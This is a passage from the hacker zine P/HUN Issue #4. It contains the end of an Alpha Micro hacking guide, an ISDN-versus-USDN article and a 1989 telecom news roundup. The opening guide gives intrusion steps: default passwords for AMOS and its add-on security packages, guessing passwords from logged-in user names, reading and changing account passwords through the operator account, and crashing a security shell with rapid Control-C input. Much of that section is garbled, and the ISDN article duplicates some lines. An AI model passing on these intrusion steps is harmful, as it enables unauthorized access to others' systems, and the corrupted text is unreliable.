access that account with a defined name.  In the above examples, logging



into SYS: is the same as logging into DSK0:[1,4].











As mentioned previously, older models of the Alpha Micro did not have any



security built in to them.  Later versions of the operating have changed



this, though.  Once you get connected and you try to log into an account,



you may be asked for a password.  The word you type is not echoed on your



screen.  Two default passwords that you can try for logging purposes are



"DEMO" and "SYSTEM SERVICE".  These are not case-sensitive, so you can



type them in either upper or lower case.  If neither of these work (which



is unlikely, since people are too lazy to change them), try running the



SYSTAT command.







What happens is that you will often see people logged in under a short



(6 digits or less) user name, such as JOHN, AMY, SUSAN, etc.  Try logging



in with one of these as your PW.  80 per cent of the time it will work.







If you've gotten into the system this far, then good.  There are lots



of things to do or access.  If you're looking around for information,



these are contained in files that end in a .TXT extension.  These may be



examined by using the TYPE command from AMOS.  The syntax would be:







        .TYPE MODEM.TXT/P







The /P is not required, but is useful, because otherwise the file would be



diaplayed too quickly for you to look at.  The /P switch displays the



contents one page at a time.  Pressing <RET> will scroll through the text.



One word of warning:  Don't use the TYPE command on .LIT, .SBR, or .OBJ



files; doing so will usually result in your terminal being locked up,



effectively ending your session.







Now let's say you wanted to check out the files that are in other accounts.



Usually all that is needed is to simply log there.  However, certain



accounts will be passworded.  There is no simple way to just dump the



contents of a disk block and see what the PW is.  There are alternatives,



however.  One method is to log into the operator account (DSK0:[1,2]) and



use the SYSACT command.  This lets you to various things to the disk, but



the one you would be concerned about lists all of the accounts on a parti-



cular disk.  The command works like this:







        .#



        .SYSACT DSK0:







Use the "H" to get a listing of all the available commands from within



SYSACT.







        *



        *h



        Implemented commands are:



        A PPN        - Add a new account



        C PPN         - Change password of an account



        D PPN        - Delete an account



        E        - Rewrite MFD and exit to monitor



        H         - Help (Print instructions)



        I        - Initialize entire disk



        L        - List current accounts







The last one "L" is the one we're concerned with.  Press <RET> after it to



see a listing of all the accounts on the disk.  Passwords (if any) will be



displayed to the right.  The "C" option will allow you to change the PW on



an individual account.  Then press "E" to go back to the command level.







If you want to check out a file a little less elegantly, this may be done



by simply copying the file to an unpassworded account or by typing the



file from another account.







+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++







Account and file structure:







As explained before, there are accounts on the disk, which may or may not



contain files in them.  AMOS maintains this account structure on the disk.



In fact, a listing of which files belong in what account are kept track of



in the account directory.







There are two types of files that are possible on the Alpha Micro:



sequential (linked) and random (contiguous) files.  Each block is 512 bytes



y.  Files may not overlap



onto another disk, and each disk block has a unique number by which it is



referenced to via AMOS.







The format of most Alpha files are sequential -- AMOS reads in each disk



block of the file, which tells it the disk address of the next disk block.



The key point is that to access one block of data, you have to access all



preceding blocks.







When AMOS writes a sequential file to the disk, it looks for the first free



disk block.  It writes a copy of the first file block into that disk



location.  Next, it looks for another free disk block.  This next disk block



may or may not be anywhere near the first block used.  This process goes on



until the entire file is transferred to the disk.  The disk blocks that make



up the file may be scattered across the disk.  Each disk block in the file



contains a portion of the file; it also contains the address of the next



disk block used by the file.







              *-----------*-----------*



              | Address of| Data in   |



              | next block| file block|



              *-----------*-----------*







Sequential files are also called linked files because the disk blocks are



linked together by the information in each block that points to the address



of the next disk block.  The last block in the file is designated as such



by a link of zero.  It looks like this:







                                                     /---X



     /----------------X       /----------------X     !    |



     !                 !      !                 !    !    X



*-----------*--------* ! *-----------*--------* !  *----------*-------*



| Address of|  DATA  | ->| Address of|  DATA  | !->|  EOF     | DATA  |



| next block|        |   | next block|        |    | Zero link|       |



*-----------*--------*   *-----------*--------*    *----------*-------*











Random files differ from their sequential counterparts because the data in



them can be accessed randomly.  AMOS knows how long the files are, and also



knows exactly where the files begin on the disk.  The operating system can



therefore access any block in a file by computing an offset value from the



front of the file, and then reading the proper disk location.  The distinc-



tion between random and sequential is that since the disk blocks don't have



to be accessed in any particular order, AMOS can locate specific data in a



file quicker.







When a random file is written to disk, the first free groups of contiguous



blocks are searched for which are large enough to hold the entire file.  If



there aren't enough blocks on the disk, the message "Disk full" appears.



Random files look something like this:











  *---------------*---------------*---------------*---------------*



  | File block #1 | File block #2 | File block #3 | File block #4 |



  *---------------*---------------*---------------*---------------*







One a random file is allocated on the disk, it is not possible to expand it.



Random files are used mainly for applications where the file length remains



constant.











The first block on a disk (block 0) is the disk ID block.  Alpha Micros use



this disk block to maintain permanent identification information about the



disk.  The next block (block 1) is the Master File Directory (MFD).  At



block 2 lies the disk bitmap.  The bitmap is the structure that keeps track



of which blocks on the disk are in use, and which are available.  The



bitmap contains one bit for each block on the disk.  If a block is in use,



the bit in the bitmap that represents that disk block is a 1; if the block



is available for use, its bit in the bitmap is a 0.  The bitmap is perma-



nently stored on the disk beginning with block 2 and extending as far as



necessary.  The last two words in te bitmap form a hash total.  If some



data in the bitmap becomes destroyed, then there is a chance that data



corruption has occurred.  The ocre for writing data to the disk is:







   [1] Find in memory a copy of the bitp of the disk to be accessedd.



   [2] Computer the hash total of the bitmap & check agains the sh.



   [3] Consult bitmap to see the next free block.



   [4] Change bitmap to shockthe block is in use.



   [5] Recompute bitmap hash to reflect the modified bmap.



   [6] Write modified bitmap back out to the disk.



   [7] Write thata to the chosen block.







Every disk contains one Master File Directory (MF  Each disk contains



one MFD.  The MFD is one block long, and contains e entry of four words



for each user account allocated on that disk.  This ps the limitation



of having a maximum of 63 user accounts per disk.







Each try in the MFD identifies a specific acct directory.  Individual



account dectories are known as User File Directories (UFDs).  The entry



contains thccount PPN, number of the first block used by the UFD, and



a password assned (if any).  The MFD contains one entry for every UFD



on the disk.One UFD exists for each user account; it contains one entry



for eachlein that account.  These contain various sorts of information



relating tthe file.  A UFD may consist of more than one disk block; if



it is larger than oblock, the first word of the FD is nzero and gives the link



to the next UFD bock.







++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++







Since the existing security  the Alpha Micro is lax, third party



comiehave wriiten their own sceurity systems, making it considerably



more dicult to access a system.  However, all is not lost.  There are a



few wato make things easier.







Default passwords are the first step.  One of the security systems, known



as TSASS, has the default passwords of MAL, MAL, MAL for its prompts.  You



will know that you've encounted an Alpha Micro running TSASS by the



message: "Welcome to a Time Shar and Security System".  Another security



package, UltraSafe, has the dult PW's of OPR, OPR, OPR.  An UltraSafe



system is harder to recognize because the prompts can be changed, although



some more common ones ask for  NAME, PORD, and GROUP.







The next option is if you have found a password that lets you in, it may be



one of low security.  This can automatically chain you into a menu or shell



program.  Depending onw the system is configure, a string of Control C'or any



other key sequence) can mess up the buffer, automatically causing



e curity system to crash, and bringing you to AMOS, without being



confined to the security program.  The input must be typed in rapidly, or



it won't work.  This method works for both TSASS and UltraSafe.







Note:  This file is written for informational purposes oy, to give



you an idea of the workings of computer security for the Al Micro



Operating System (AMOS).  If you want more information on the inner workings of



this operating system, then get in touch with me.







                     Nightcrawler out!



===============================================================================















$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



$            P/HUN Issue #4            $



$       Volume 2: Phile 9 of 11        $



$                                      $



$                                      $



$           USDN VERSUS ISDN           $



$           ----------------           $



$                                      $



$                 by                   $



$                                      $



$                                      $



$              LORD MICRO              $



$              **********              $



$                                      $



$   TOLL CENTER BBS - (718)-358-9209   $



$         A 2600 MAGAZINE  BBS         $



$                                      $



$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$











PREFACE:  The integrated services digital network (ISDN) is a long-range



plan for systematically upgrading the televommunications networks of various



countries to provide both voice and data services on a single physical network.



European countries have been the major force behind degining ISDN.  The U.S.



however, will require a variant of ISDN, because its communications



industry operates in a competitive user-oriented environment.  This article



describes the differences in implementation and services that can be expected



with USDN (the U.S. version of ISDN) and identifies unresolved issues that



should concern the data communications manager.







INTRODUCTION



------------







  The ISDN proposal has recieved worldwide attention for at least a decade.



Constrained by an apathetic marketplace, technical limitations, economic



considerations, and the slow pace involved in establishing acceptable



world-wide standards, implementation of ISDN has occured principally in



laboratories only.







  The International Telegraph and Telephone Consultative Committee (CCITT)



has attempted to define and obtain general consesus regarding ISDN



objectives, interfaces, services, and standards.  The CCITT-backed ISDN



principally represents European interests.  Although the U.S. is repre-



sented in the CCITT and offers support for its programs, the major



telecommunications organizations in the U.S. are more interested in estab-



lishing their own standards and programs.  So, while ISDN seems to be



gaining more U.S. support, it continues to reflect a European perspective.



Recently, the term USDN has been used to distinguish the modifications to



ISDN that are expected to evolve in the U.S.  The USDN concept is one of



integrated access to multiple networks, rather than the integrated services



on one network approach of the ISDN proposal.







  The U.S. telecommunications industry has long recognized that ISDN would



have a somewhat modified personality in the U.S. Several industry-wide



ISDN conferences addressed the U.S. equivalent to ISDN, but none of the



conference comittees proposed that the U.S. adopt ISDN totally, be-



cause of the unique characteristics of the U.S. communications environment.







THE U.S. COMMUNICATIONS ENVIRONMENT



-----------------------------------







  The unique U.S. communications industry characteristics that influence



the USDN effort are described in the following section.  These characteristics



are summerized in Table 1, which compares the U.S. communications environment



with the environment in other countries.







  The Competitive Marketplace:  In the U.S., the privately managed telephone



industry responds, rapidly to user demands for new services.  In most other



countries, however, services are established in a slow, deliberate program



by one government-administrated source, usually the country's postal,



telephone, and telegraph (PTT) agency.  The users then decide if and how



they will use the services offered.







  Technology Advances:  Second only to the competitive marketplace, technology



advances include component developments such as as memory devices, VLSI



chip design, and optical elements.  Developments in the system architecture,



networking, and functional interfaces in transmission and switching



technologies are equally important in defining the USDN concept.







  Less Restrictive National Standards:  Because standards imply conformity,



they can restrain innovation.  Because they are not required to undergo a



lengthy standards-approval cycle, U.S. manufacturers are free to produce



systems that are incompatible with existing equipment.  De facto standards



are often established by the market's acceptance of a particular system.







                       Comparing ISDN and USDN







FEATURES              CLASSICAL ISDN             USDN ENVIRONMENT



                      ENVIRONMENT



--------              --------------             ----------------



Competition           Essentially None           Varied, encouraged by



                                                 government







Standard Inter-       CCITT                      Essentially none



exchange Carriers     One, nationalized          Many, equal access



Existing Investment   Due for replacement        Huge, undepreciated



                                                 investment







Service Offerings     By PTT schedule            Entrepreneurial, competitive



Implementation Cost   Government-provided funds  Private Capital











  Multiple Carriers and Competative Networks:  The premise of ISDN is that a



common national network will evolve, able to handle multiple voice and data



services in an integrated fashion.  ISDN thus precludes a carrier by-passing



a local office or vying for customers' traffic through innovative techniques.



In most countries other than the U.S., telephone companies are not legally



required to provide or counter new service offerings.  Integrated digital



networks (IDNs) are emerging in the U.S. that provide digital access and



transmission, in both circuit-switchhed and packet modes.  The number of



IDNs will probably increase regardless of whether an ISDN is proposed for



the U.S.







  Embedded Investment:  The U.S. has invested heavily in modern stored-program



controlled (SPC) switching.  However, other countries are only now facing



conversion to SPC, as much of their existing systems investment is



greatly  depreciated.  These countries can therefore converty to ISDN



switching in a more orderly and economical fashion that the U.S. can.  Thus



the U.S. will have overlay networks, digital adjuncts to existing SPC



switches, and multiple networks in the foreseeable future.







EVOLUTION OF U.S. COMMUNICATIONS OFFERINGS



------------------------------------------







  The American solutions to data transmission problems have tended to be



faster, more practical, and less elegant than those evolving in Europe.



Not surprisingly, the American solutions have generally ignored  CCITT



recommendations.  For example, public packet-switched networks such as TYMNET,



GTE Telenet, and Satellite Business Systems are offered to some customers



with long-haul traffic.  These systems were severly limited because they



often required access through analog local office.  Many major industries



and private organizations thus established their own data networks, often



point to point over leased circuts.  Digital Terminating Service was



introduced to provide 56K bit-per-second (up to 448K bit-per-second)



links to the end user over special transmission links.  Digital Electronic



Message Service was recently approved to provide 1.5M bit-per-second service



to the end user.



  Some suppliers are now offering PBXs with 64K bit-per-second local loops



and direct pulse code-modulated (PCM) trunks to the public network.  Two



new standard 1.544M bit-per-second central office-to-PBX interfaces have



been established, the Northern Telecom Computer-to-PBX-interface and



the AT&T Information Systems Digital Multiplexed Interface.







  The Development of Local Area Networks:  The increasing use of data



terminals and the growth of distributed processing has led to the necessity



of transporting data at rapid rates within a building or local area.



This rapid local data transmission imposed impossible requirements on the



conventional PBX.  While PBX designers struggled to upgrade their data



capabilities, computer manufacturers saw the oppertunity to offer local



area networks (LANs) designed specifically to provide wideband data transport



between users in a limited area.  Again, expediency and the competitive



climate produced a practical solution - several LANs with different



architectures and protocols.   In general, these LANs so not conform to the



ISDN protocol levels identified in the International Standards Organization



(OSI) models.  However these LANs cannot be eadily replaced, so the USDN



will have to accommodate them.



  A case in point is the apparent conflict between the ISO model of Open



System Interconnection (OSI) and the IBM System Network Architecture (SNA).



The OSI model of a seven-layered architecture for data networks has been



defined for the first four layers only.  International agreement on the



remaining protocols will take several more years to obtain, if agreement on



the remaining protocols will take several more years to obtain, if agreement



is possible, Meanwhile, in the U.S., IBM defined a similar protocol, SNA,



and has implemented numerous networks.  Long before any ISO standard can be



established, the U.S. will be well populated with SNA systems.  The USDN



must be at least compatible with SNA, and SNA could become the national



standard.



  Because future PBXs will probably be able to switch synchronous data at



64K bits per second (and multiples therof, up to at least 1.544M bits per



second), there may not be sufficient switched wideband traffic requirements



to support a seperate LAN standard.  Long-distance dedicated data services



such as AT&T's ACCUNET and SKYNET are competing for data traffic.  In



addition, various data-over-voice (DOV) schemes have been employed over



switched analog circuts.  In short, many approaches, services, and facilities



have already been implemented to satisfy the immediate market needs, without



regard to an orderly transition to ISDN.  Thus, the USDN will have to



accomodate thesee established services and inteface with most of them.







  Introduction of Local Area Data Transports:  Recently, electronic (carrier)



serving areas have been replacing long local physical loops.  These



subscriber carrier systems provide such data capabilities as DOV and local



area data transport (LADT).  LADT offers a packet-switched data capability



that may apply to both business and residential services;  its low speed



(up to 4.8K bits per second) and relatively low cost may make it universally



attractive.  LADTs may find widespread use for Videotex, meter reading,



power load shedding, security reporting, and marketing transactions.



  Although LADT is restricted primarily to a local exchange area, the



evolving USDN will provide transport between LADTs.  LADT subscribers will



access the USDN transport carrier through pooled local data concentrators.



A typical LADT Data Subscriber Interface (DSI) unit will concentrate data



from 124 subscribers to a 56K (or 9.6K) bit-per-second trunk to a packet



network.  A subscriber can thus dial up a DSI over a conventional voice



loop and transport data through a modem (which may be a part of the



terminal) by means of the switch.  A direct access mode is also available



with the subscriber loop terminating on the DSI, permitting independant



simultaneous data and voice transmission.  The X.25 link access protocol-



balanced (LAPB) is used, but protocol conversion is restricted in many



instances by federal rules.  Although LADTs so not comply with any defined



ISDN service, they are an integral requirement of the USDN.







  CSDC Technology:  Circut-switched digital capability (CSDC) is another



USDN service that has no ISDN counterpart. CSDC is an alternative voice-



or data-switched circut with end-to-end 56K (or 64K) bit-per-second



transparent connection ensured by dedicated trunk groups in each



switching location.  CSDC facilitates large, continuous, bulk data trans-



fers, and its implementation requires added investment in each switch



location as special terminal equipment.  CSDC represents yet another



expediant toward providing ISDN-like services while using existing investment.



CSDC technology can also accomodate a full ISDN, if one ever evolves in the



U.S.







  Digital Subscriber Loops:  ISDN-compatible digital subscriber loops (two



voice, plus one data channel at 144K bits per second) are recieving attention



in the U.S., but the commercial implementation of this technology is not



prograssing rapidly.  Near-term subscriber loops will probably acquire data



capability by data ober analog voice multiplexing.  Although this step



would not precluse the eventual inclusion of ISDN loops, it would tend to



slow their introduction and widespread acceptance.







  Interfaces and Protocols: Although the ISDN revolves around the 30 channel



PCM transmission format used in Europe, it does provide for the 24 channel-



based systems used in the U.S.  However, U.S. systems have many unique



interface requirements.  A new set of proposed services will require



forwarding of the calling number for control or processing by either the



terminating switching system or the called subcriber.  Exchange of such



information will likely be accomplished over a local area common channel



signaling system or a fulll CCITT standard, signaling system #7 network.



  Direct data exchange between a network switching unit and a sata bank



and/or processor facility will probably evolve from the current trunking



scheme to a direct signaling carrier, perhaps CCITT standard #7 with OSI



and/or SA protocols.



  Calls to cellular mobile roamers (i.e., mobile units that have traveled



outside their base area) will probably be routed to a central data base for



locating routes.  A personal locator service for automatically routing calls



to the unit's temporary location will require unique system interface and



protocols.  Privately owned transaction networks may provide this unique



interface.  While the objective is to eventually use CCITT standard #7 as a



vehicle and X.25 as an interface protocol, the USDN must embrace a wide



assortment of formats, protocols, and interfaces for the near future.







TRANSMISSION TECHNOLOGY TRENDS







  Ultimately, subscriber loops in the U.S.  will be digital, providing two



64K bit-per-second voice or data channels (i.e.,two B channels) and one 16K



bit-per-second voice or data channels (i.e., two B channels) and one 16K



bit-per-second data only (i.e., one D channel).  The 16K bit-per-second



channel will probably permit an 8K bit-per-second user data channel or



submultiplexed channels of a lower bit rate.  Full-duplex (i.e., four wire)



operation will be provided by echo-canceling techniques over existing



two-wire loops.  An alternative approach of time-domain multiplexing may



also be used, especially in the neat term.











  Local Loops:  Although modems will not be required at either end of the



local loop, network terminating equipment will be required to serve as the



multiplexor and, perhaps, as voice CODECs.  Users of such circuts can have



full, simultaneous, reall-time voice and data channels, as well as seperate



control, metering, and low-speed data transmission.  With advanced



switching centers, each circut can be routed and billed independently.



Existing 56K bit-per-second channels on conventional 24-channel digital



carrier systems will be replaced by or supplemented with 64K bit-per-second



clear channels with extended framing.



  The local loop plant in many areas is already migrating toward carrier-



serving areas, implemented by a subscriber carrier capable of digital



transmission.  Some local telephone companies are installing glass fiber in



their local plants in preparation for the downward migration of direct



digital transmission.  However, until full, ISDN-type local loops are



universally available, near-term adaptations will be offered to satisfy



market needs and to prevent users from seeking other communications



facilities.







  Wideband Circuts:  Wideband circuits (i.e., multiples of 64K bits per



second) over the public switched network may become feasible as newer



switching elements are used.  Although some transmission links may soon



be able to combine DS-O channels for real-time wideband service, limitations



in switching centers will restrict their general use.  Seperate wideband



switching modules, multiplexing on CATV, or extension of wideband LANs may



ultimately appear if the need for wideband transmission remains strong.







  Packet Transmission:  Packet transmission is an inherent element of the



ISDN.  However, the USDN must handle separate packet networks, separate



facilities, separate routing, and even separate providers.  It is unlikely



that American packet networks in the U.S. will ever be combined into an



integrated, single-network ISDN.  Therefore, the USDN must accommodate such



overlay networks and the associated problems of routing, protocol conver-



sion, circuit maintenance, billing, and network management.  American users



will demand and recieve more options for data transport, data processing,



and support services than any single network is likely to provide.







SWITCHING TECHNOLOGY TRENDS







  Implementing ISDN standards on the switching systems already in place



throughoout the U.S. is a formidable task.  Most local end offices have



been replaced by SPC analog switches within the past decade.  More recently,



SPC digital switches have been installed, and this trend will probably



accelerate through the 1990s.  However, these newer switches are third-



generation design; that is, they are designed primarily to handle conventional



voice circuit switched traffic within a hierarchical network.  These switches



are not optimized for data handling, multiple networks, or sophisticated user



needs.  Although hardware retrofits and software patches are being applied to



accommodate LADT, CSDC, and digital loops, such solutions result in limited



user services, higher costs, and more complex maintenance requirements.







  Fourth-Generation Switching:  Fourth-generation switching systems, design-



ed for USDN requirements, are beginning to appear.  A fourth-generation



switch is optimized for data; voice switching is simply a special case of



data transmission at speeds of 64K bits per second, 32K bits per second,



or any other evolutionary compressed voice bit rate.  Fourth-generation



switches do not have central processors.  Each functional unit (e.g., lines



or trunks) contains its own processing hardware and software to output



packet-format messages (i.e., containing a header message and a data byte)



in a uniform deferred format.  (The data byte may be a digitized voice sample.)



These packets then are routed through a central matrix, which also contains



sufficient processing power to route packets to their interim or final



destination with only the data contained in the header bits of the call



itself.



  Services such as route translation, tone reception, billing recording, and



termination functions are inserted into a call in progress by routing the



call packets to specific functional modules on demand.  The modules perform



the required call functions and return the packetsto the matrix. (or interal



network).  When the required call-handling functions have been sequentially



accomplished, the call is terminated to the desired port and a virtual



circuit is established between the calller and called terminals.  During



the call, the packet header provides control and supervision and performs



routine maintenance and alarms.



  A fourth-generation switch performs required functions-Centrex attendants,



toll operators, common-channel signaling, or LAN termination-when the



appropriate module is simply plugged in.  These functions do not affect



existing system service or capacity.  Ideally suited to the USDN, the fully



distributed  control architecture of a true forth-generation switch



could also meet the longer-range objectives of the ISDN.



  Because they do not require a large, costly central processor complex,



fourth-generation switches can be economically applied as add-on units or



adjuncts to existing SPC switches.  Fourth-generation switches thus provide



advanced capabilities without the necessity of replacing or retrofitting



the existing switches.  Some features that can be provided as adjuncts



are described in the following paragraphs.







  Special Services:  In the U.S., services that require more sophisticated



transmission that provided by standard telephone lines are expanding rapidly.



By the end of the 1980s, 50 percent of all lines may require some special



treatment.  A USDN switch, or a special service adjunct can provide univer-



sal line circuits that can be remotely administered for transmission



balance, type of transmission, routing, and signaling.  The special service



adjunct can provide various voice and data arrangements and automatic



facilities testing as well as provide and maintain sophisticated data and



voice services, often without changing the user's original telephone number.







  Business Services:  Integrated toll, local, Centrex, PBX, and instrument/



terminal systems are not provided in the U.S. because of its regulatory



climate.  Regulations controlling enhanced services, authority to provide



services, equal-access provisions, and franchising of special carriers and



servers all affect the USDN but are constraints in the ISDN plans.  Because



of the uncertainty and ambiguity in such regulatory matters, the business



services adjunct can be used with less economic risk than replacing or



retrofitting existing switching systems would incur.  The business services



adjunct permits the existing local office to continue providing the local



telephone service for which it was optimized.  The business services



adjunct can also economically provide such features as:



    *  Citywide, Centrex-like service with universal numbering among user



       locations.



    *  Centralized attendants and night service



    *  Direct data lines at 64K bits per second



    *  Rerouting of existing PBX trunks with improvement in features



    *  Lan termination for PBX-to-Lan connections and LAN-to-LAN bridging.











=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







                  P/HUN Issue #4, Volume 2: Phile 10 of 11



                  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD



                     __________________________________



                    |                                  |



                    |  P/HUN Telecom News/Advancements |



                    |            PART 1                |



                    |         By  DareDevil            |



                    |__________________________________|















Feb. 17-19, 1989



SATELLITE USE WILL KEEP SOARING:







   Satellites and fiber-optic cables will be used for



international communications well into the 21st century, according



to a Communications Satellite Corp. study. The study suggests that



services using satellite systems could be up to 45% less expensive



than international transmissions that use fiber. Also giving



satellites staying power: Ability to reach remote areas.







RCI SENDS CALLS OVER THE WATER:



   RCI Long Distance, a subsidiary of Rochester Telephone, said



Thursday that it has added 122 countries to its international



service, including popular calling areas such as West Germany and



Israel. Rates: RCI says only that the service will be priced



competitively with other carriers offering international services.







PROGRAM PUTS NETWORK ON THE MAP:



   A computer program from Connections Telecommunications can be



used by network designers to create a visual map of their



wide-area network, reports Computerworld magazine. The program,



called Mapconnect, will superimpose over a map of the USA the



serving office, hubbing point and area sites with their



connections. Cost: $2,000 per copy, plus $400 annual maintenance



after the first year.







CALIFORNIA, MORE FIRMS COMPETE:



   Competition for local access and transport area data



transmissions to long distance carriers has been strengthened in



California by a recent PUC decision. The commission approved a



deregulation plan that will likely have MCI, US Sprint and Cable



and Wireless Management Services competing with Pacific Bell and



GTE California, says CommunicationsWeek.







VERMONT TO UPGRADE TELE SYSTEM:



   The State of Vermont will be getting technical support for



improvements in its telecommunications network from Federal



Engineering Inc., according to CommunicationsWeek. Contract value:



Not revealed. Federal Engineering has provided similar service in



Montana, New Mexico, North Dakota, Virginia and Wyoming.







CAMPUS GETS BIG DOSE OF HI-TECH:



   Southwestern Bell is putting more than 40 miles of high-speed



fiber optics into the St. Louis Community College system, reports



CommunicationsWeek. The network will link the school's 3 campuses



and headquarters to provide video, voice and data transmissions



for educational programs. Cost to the school: $580,000, plus



$2,000 per month to use the system.







SOMEONE MIGHT BE LISTENING:



   About 30 hours worth of recorded audio-visual material was



recorded by New York City residents recently for transmission into



outer space, reports InfoText magazine. AT&T set up the free



service at its headquarters. Messages were beamed into space on



the company's satellite dishes. Among the messages: A young



student reported on a pro basketball game for any interested



"aliens."







-------------------------------------------------------------------------------



Feb. 20, 1989



AT&T PLANS OVERHAUL:



   AT&T announced a sweeping overhaul Friday designed to make the



long-distance company more competitive and profitable. AT&T will



split its 5 business groups into 12 units to 25 units that each



will have sole responsibility for a product or service. The idea



will be phased in over a period of months this year. (For more,



see special AT&T package below. From the USA TODAY Money section.)







JAPAN SET FOR JUNGLE LAUNCH:



   The first of 2 satellites for the Japan Communications



Satellite Co. lifts off Feb. 28 from a jungle launch pad in French



Guiana. The launch will inaugurate commercial satellite



communications in Japan and be the first of Hughes Communications'



new HS 393 series. The satellite will begin serving the Japanese



islands, including Okinawa, after a 30- to 60-day testing period.







SATELLITE HAS MANY CUSTOMERS:



   The JCSAT 1 satellite going into orbit on Feb. 28 will provide



the Japanese islands with various new services. Scheduled to come



off the satellite: Network and cable TV distribution, used-car



auctions, prep school classes, religious programming, automobile



dealer training, a specialized engineering video network. Also: A



business group plans to offer business communications.







BIG SATELLITE WON'T BE THE LAST:



   With a deployed height of 10 meters, the Hughes Communications'



satellite being launched by Japan next week will be the largest



Hughes commercial satellite ever launched. It contains 32



transponders, each one capable of transmitting one TV channel, 45



million bits of data per second, or more than 250 telephone



circuits. Japan will launch a second satellite this summer.







SPACE STATION MAKES AUDIO PLANS:



   NASA has chosen Harris Corp. audio communications systems for



use on the space station Freedom, scheduled for operations in



1995. CommunicationsWeek says that under a $35 million subcontract



with Boeing Aerospace, Harris will design, develop and produce



systems for onboard use. Special feature: At times when crew



members have their hands busy, a voice recognition capability will



be available.







CHINA SPRINTS FOR THE MICROWAVE:



   About 90% of its surplus microwave network has been sold or



dismantled by US Sprint, according to CommunicationsWeek. The old



equipment is being replaced by a fiber network. Most recently, the



People's Republic of China spent about $15 million for 6,000 used



analog microwave radios and 600 parabolic antennas. China plans to



use the equipment on 11 existing microwave networks.







NYNEX BEGINS ANOTHER TEST:



   Nynex is providing a digital data-over-voice private-line



access service for Telenet Communications in a New York City field



trial. It is one of 35 basic service elements Nynex specified in



its Open Network Architecture plan for the FCC, reports



CommunicationsWeek. Nynex expects to present 14 other new



offerings before the end of the year.







BOSSES GET MORE RESPONSIBILITY:



   The reorganization plan announced by AT&T Friday is the first



major policy move by Robert E. Allen since he took over last April



as chairman. The goal: Get managers to focus more on customers and



on costs by giving them total responsibility for any money they



make or lose. Right now most of that responsibility is held by top



managers at AT&T.







AT&T HOPES FOR BIGGER SALES:



   The AT&T move to split its business groups comes at an



opportune time. AT&T is losing market share in the long-distance



phone market to rivals MCI and US Sprint. Also: AT&T's overall



sales growth has been modest over the last several years. Under



the new plan, the presidents of AT&T's 5 operating groups will be



renamed group executives. The new units will operate as



independent businesses.







NEW APPROACH MIGHT START SLOWLY:



   Analysts say it will take years to streamline AT&T's



bureaucracy and get managers accustomed to being directly



accountable for the performance of their businesses. AT&T reported



a loss of $1.67 billion on sales of $35.21 billion in 1988.



Earnings were reduced by a net charge of $3.94 billion from



writing off old equipment and accelerating modernization of its



long-distance network.







-------------------------------------------------------------------------------



Feb. 21, 1989



DATA CROSSES MILES WITH SPEED:



   Northern Telecom yesterday announced the availability of the



High Speed Data Module, a data connectivity device that is an



addition to the Meridian SL-1 Data Services product line. A



typical application might involve a bank that uses the module to



connect a programming facility with the bank's main data center,



located approximately 400 miles away. Cost: $725.







INMATES TOUCH, SAVE AND LOSE:



   Some 15 inmates from local prisons in the Nashville, Tenn.,



area face computer fraud charges after figuring out Touch & Save



long-distance phone customers' user codes. Officials say the



inmates charged more than $2,000 in calls. The inmates gained



access to the codes and sold them for $5 or more to others in the



prison. (From the USA TODAY News section.)







PRODUCTS WILL PROTECT DATA:



   CompuServe Inc. has introduced new encryption products for its



public packet data network, Network World reports. The encryption



services let users move data from expensive leased lines to



cost-effective dial-up public circuits, while protecting the data



from unauthorized access. The cost ranges from $1,495 to $8,100.







PROTEON UNVEILS FIBER MODEM:



   Proteon Inc. has developed a single-mode, fiber-optic modem



that will extend the distance between 2 nodes on a token-ring



network, says Network World. The p3282 modem permits 2 nodes to



communicate over a maximum distance of 30 kilometers without using



a repeater. The fiber also uses optical laser technology instead



of LEDs for transmission of the signal. Cost: $10,000.







NETWORK CHARGES ARE DROPPED:



   Transettlements Inc. has stopped making additional charges for



internetwork transmission, reports Computerworld magazine. The



firm will no longer charge its users fees, penalties or premiums



for interconnection with other value-added networks. The charge



for going through 2 networks will be the same for going through



only Transettlement's network.







AIRLINES, HOTELS JOIN NETWORK:



   GEnie, a consumer online information service from GE



Information Services, is now offering the Official Airline Guide



Electronic Edition Travel Service. The edition will permit GEnie



subscribers to view airline schedules, fares and hotel



information. Cost: A surcharge on GEnie of 17 cents/minute during



non-prime hours and a surcharge of 47 cents/minute during prime



time.







RESERVATIONS ARE A TOUCH AWAY:



   Harrah's Reno introduced a guest service center at the Reno



Airport yesterday that uses interactive, live video to streamline



guest reservations. Guests can check into Harrah's, make dinner



reservations and arrange to see a show by touching a TV screen.



The system uses Nevada Bell's new ISDN network that allows voice,



data and video communications to use fiber optic wires



simultaneously.







-------------------------------------------------------------------------------



Feb. 22, 1989



PHONE USERS DO IT THEMSELVES:



   US West's 35,000 Bellingham, Wash., customers will test the



first of what could be a major telephone innovation:



Instantaneous, do-it-yourself phone service. In the plan, a person



could shut off service, have a 3-way holiday conversation and have



calls sent to work - all by dialing a series of numbers. (For



more, see special Phones package below.)







SATELLITE TO SERVE INDONESIA:



   Scientific-Atlanta has been selected to supply a half dozen



major communication systems in the Pacific Rim: A VSAT satellite



link for Indonesia and 5 private television networks for Japanese



firms. The satellite network will provide interactive data, video



and voice communications to as many as 4,000 sites on the 13,677



islands that make up the Republic of Indonesia.







NETWORKS TO GO ON NEW SATELLITE:



   Nippon Telephone & Telegraph Co. of Tokyo and 4 other Japanese



companies said yesterday they will use Scientific-Atlanta's B-MAC



satellite technology to establish 5 private business television



networks in Japan. When their private television networks are



completed, Nippon, Nikken, Telecom Sat and Video Sat plan to send



video signals to JC-Sat, Japan's new communications satellite.







TELCO ENTRY IS UNPREDICTABLE:



   Congress will probably not address the issue of telephone



companies entering the TV business in the near future, National



Assn. of Broadcasters President Eddie Fritts tells Broadcasting



magazine. He says the telco entry will be one of the top issues of



the 1990s. But he stops short of making predictions, saying only



that free over-the-air broadcasting will survive.







MORE STATIONS PICK UP SATELLITE:



   Satellite-delivered talk-radio programs are growing as AM



station directors look more closely at the potential of



low-maintenance, national talk shows. Broadcasting magazine says



the 3 month-old American Radio Networks joined the field with 22



